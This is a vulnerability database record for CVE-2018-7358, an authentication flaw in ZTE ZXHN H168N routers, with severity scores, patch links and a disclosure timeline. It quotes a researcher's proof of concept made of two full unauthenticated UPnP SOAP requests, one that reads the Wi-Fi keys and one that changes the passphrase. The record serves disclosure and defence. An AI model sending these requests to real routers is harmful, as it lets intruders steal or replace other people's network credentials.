Sign-up

ID

VAR-201811-0984


CVE

CVE-2018-7358


TITLE

ZTE ZXHN H168N Authentication vulnerabilities in products

Trust: 0.8

sources: JVNDB: JVNDB-2018-012683

DESCRIPTION

ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations. ZTE ZXHN H168N The product contains authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ZTE ZXHN H168N is prone to an authorization-bypass vulnerability. ZTE ZXHN H168N versions 2.2.0_PK1.2T5, 2.2.0_PK1.2T2, 2.2.0_PK11T7 and 2.2.0_PK11T are vulnerable. ZTE ZXHN H168N is China's ZTE Corporation ( ZTE ) company’s a wireless VDSL router. ZTE ZXHN H168N There are security holes in . The following versions are affected: ZTE ZXHN H168N V2.2.0_PK1.2T5 Version, V2.2.0_PK1.2T2 Version, V2.2.0_PK11T7 Version, V2.2.0_PK11T Version. [*] POC: (CVE-2018-7357 and CVE-2018-7358) Disclaimer: [This POC is for Educational Purposes , I would Not be responsible for any misuse of the information mentioned in this blog post] [+] Unauthenticated [+] Author: Usman Saeed (usman [at] xc0re.net) [+] Protocol: UPnP [+] Affected Harware/Software: Model name: ZXHN H168N v2.2 Build Timestamp: 20171127193202 Software Version: V2.2.0_PK1.2T5 [+] Findings: 1. Unauthenticated access to WLAN password: POST /control/igd/wlanc_1_1 HTTP/1.1 Host: <IP>:52869 User-Agent: {omitted} Content-Length: 288 Connection: close Content-Type: text/xml; charset="utf-8" SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys" 1 <?xml version="1.0" encoding="utf-8"?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"></u:GetSecurityKeys></s:Body></s:Envelope> 2. Unauthenticated WLAN passphrase change: POST /control/igd/wlanc_1_1 HTTP/1.1 Host: <IP>:52869 User-Agent: {omitted} Content-Length: 496 Connection: close Content-Type: text/xml; charset="utf-8" SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys" <?xml version="1.0" encoding="utf-8"?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope> [*] Solution: UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices. [*] Note: There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same. [+] Responsible Disclosure: Vulnerabilities identified - 20 August, 2018 Reported to ZTE - 28 August, 2018 ZTE official statement - 17 September 2018 ZTE patched the vulnerability - 12 November 2018 The operator pushed the update - 12 November 2018 CVE published - CVE- 2018-7357 and CVE-2018-7358 Public disclosure - 12 November 2018 Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522

Trust: 2.07

sources: NVD: CVE-2018-7358 // JVNDB: JVNDB-2018-012683 // BID: 105963 // VULHUB: VHN-137390 // PACKETSTORM: 150728

AFFECTED PRODUCTS

vendor:ztemodel:zxhn h168nscope:eqversion:2.2.0_pk1.2t2

Trust: 2.4

vendor:ztemodel:zxhn h168nscope:eqversion:2.2.0_pk1.2t5

Trust: 2.4

vendor:ztemodel:zxhn h168nscope:eqversion:2.2.0_pk11t

Trust: 2.4

vendor:ztemodel:zxhn h168nscope:eqversion:2.2.0_pk11t7

Trust: 2.4

vendor:ztemodel:zxhn h168n 2.2.0 pk11t7scope: - version: -

Trust: 0.3

vendor:ztemodel:zxhn h168n 2.2.0 pk11tscope: - version: -

Trust: 0.3

vendor:ztemodel:zxhn h168n 2.2.0 pk1.2t5scope: - version: -

Trust: 0.3

vendor:ztemodel:zxhn h168n 2.2.0 pk1.2t2scope: - version: -

Trust: 0.3

vendor:ztemodel:zxhn h168n 2.2.0 pk1.2t6scope:neversion: -

Trust: 0.3

sources: BID: 105963 // JVNDB: JVNDB-2018-012683 // CNNVD: CNNVD-201811-445 // NVD: CVE-2018-7358

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2018-7358
value: HIGH

Trust: 1.0

psirt@zte.com.cn: CVE-2018-7358
value: MEDIUM

Trust: 1.0

NVD: CVE-2018-7358
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201811-445
value: HIGH

Trust: 0.6

VULHUB: VHN-137390
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2018-7358
severity: MEDIUM
baseScore: 5.8
vectorString: AV:A/AC:L/AU:N/C:P/I:P/A:P
accessVector: ADJACENT_NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 6.5
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-137390
severity: MEDIUM
baseScore: 5.8
vectorString: AV:A/AC:L/AU:N/C:P/I:P/A:P
accessVector: ADJACENT_NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 6.5
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2018-7358
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: ADJACENT
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 2.8
impactScore: 5.9
version: 3.0

Trust: 1.8

psirt@zte.com.cn: CVE-2018-7358
baseSeverity: MEDIUM
baseScore: 6.5
vectorString: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
attackVector: ADJACENT
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: HIGH
exploitabilityScore: 2.8
impactScore: 3.6
version: 3.0

Trust: 1.0

sources: VULHUB: VHN-137390 // JVNDB: JVNDB-2018-012683 // CNNVD: CNNVD-201811-445 // NVD: CVE-2018-7358 // NVD: CVE-2018-7358

PROBLEMTYPE DATA

problemtype:CWE-287

Trust: 1.9

sources: VULHUB: VHN-137390 // JVNDB: JVNDB-2018-012683 // NVD: CVE-2018-7358

THREAT TYPE

remote or local

Trust: 0.6

sources: CNNVD: CNNVD-201811-445

TYPE

authorization issue

Trust: 0.6

sources: CNNVD: CNNVD-201811-445

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2018-012683

PATCH
title:Improper Authorization Vulnerabilities in ZTE ZXHN H168N Producturl:http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523
Trust: 0.8
title:ZTE ZXHN H168N Security vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=86848
Trust: 0.6
sources:
            
            
            JVNDB: JVNDB-2018-012683 // 
            
            
            
            CNNVD: CNNVD-201811-445

EXTERNAL IDS
db:NVDid:CVE-2018-7358
Trust: 2.9
db:BIDid:105963
Trust: 2.0
db:ZTEid:1009523
Trust: 2.0
db:EXPLOIT-DBid:45972
Trust: 1.7
db:JVNDBid:JVNDB-2018-012683
Trust: 0.8
db:CNNVDid:CNNVD-201811-445
Trust: 0.7
db:VULHUBid:VHN-137390
Trust: 0.1
db:ZTEid:1009522
Trust: 0.1
db:PACKETSTORMid:150728
Trust: 0.1
sources:
            
            
            VULHUB: VHN-137390 // 
            
            
            
            BID: 105963 // 
            
            
            
            JVNDB: JVNDB-2018-012683 // 
            
            
            
            PACKETSTORM: 150728 // 
            
            
            
            CNNVD: CNNVD-201811-445 // 
            
            
            
            NVD: CVE-2018-7358

REFERENCES
url:http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009523
Trust: 2.0
url:http://www.securityfocus.com/bid/105963
Trust: 1.7
url:https://www.exploit-db.com/exploits/45972/
Trust: 1.7
url:https://nvd.nist.gov/vuln/detail/cve-2018-7358
Trust: 0.9
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7358
Trust: 0.8
url:http://www.zte.com.cn/
Trust: 0.3
url:http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009522
Trust: 0.1
url:http://schemas.xmlsoap.org/soap/encoding/"><s:body><u:getsecuritykeys
Trust: 0.1
url:http://schemas.xmlsoap.org/soap/envelope/"
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2018-7357
Trust: 0.1
url:http://schemas.xmlsoap.org/soap/encoding/"><s:body><u:setsecuritykeys
Trust: 0.1
sources:
            
            
            VULHUB: VHN-137390 // 
            
            
            
            BID: 105963 // 
            
            
            
            JVNDB: JVNDB-2018-012683 // 
            
            
            
            PACKETSTORM: 150728 // 
            
            
            
            CNNVD: CNNVD-201811-445 // 
            
            
            
            NVD: CVE-2018-7358

CREDITS
Usman Saeed
Trust: 0.4
sources:
            
            
            BID: 105963 // 
            
            
            
            PACKETSTORM: 150728

SOURCES
db:VULHUBid:VHN-137390
db:BIDid:105963
db:JVNDBid:JVNDB-2018-012683
db:PACKETSTORMid:150728
db:CNNVDid:CNNVD-201811-445
db:NVDid:CVE-2018-7358

LAST UPDATE DATE
2024-11-23T22:30:10.941000+00:00

SOURCES UPDATE DATE
db:VULHUBid:VHN-137390date:2019-10-09T00:00:00
db:BIDid:105963date:2018-11-15T00:00:00
db:JVNDBid:JVNDB-2018-012683date:2019-02-06T00:00:00
db:CNNVDid:CNNVD-201811-445date:2019-10-17T00:00:00
db:NVDid:CVE-2018-7358date:2024-11-21T04:12:03.917

SOURCES RELEASE DATE
db:VULHUBid:VHN-137390date:2018-11-14T00:00:00
db:BIDid:105963date:2018-11-15T00:00:00
db:JVNDBid:JVNDB-2018-012683date:2019-02-06T00:00:00
db:PACKETSTORMid:150728date:2018-12-11T01:49:45
db:CNNVDid:CNNVD-201811-445date:2018-11-15T00:00:00
db:NVDid:CVE-2018-7358date:2018-11-14T15:29:02.220